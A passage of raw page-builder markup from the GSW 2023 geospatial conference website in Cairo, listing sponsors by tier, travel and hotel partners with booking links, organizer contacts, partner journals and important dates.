style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://geomatex.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/32596kmnqz.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n<p style=\"text-align: center;\"><a href=\"https://gsw2023.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/08/mgeo.jpg\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" 